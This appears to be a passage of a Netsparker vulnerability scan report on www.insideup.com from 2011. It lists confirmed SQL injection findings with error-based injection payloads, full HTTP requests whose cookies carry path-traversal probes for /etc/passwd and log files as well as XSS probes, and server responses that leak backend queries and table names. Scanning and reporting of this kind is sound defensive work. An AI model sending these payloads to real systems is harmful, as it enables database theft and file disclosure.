1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:30:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=544lqup2abq45r6l90icof60l4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f84fgck871o47vr7vhekf3l3l3; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
[Probable] SQL Injection

[Probable] SQL Injection
23 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
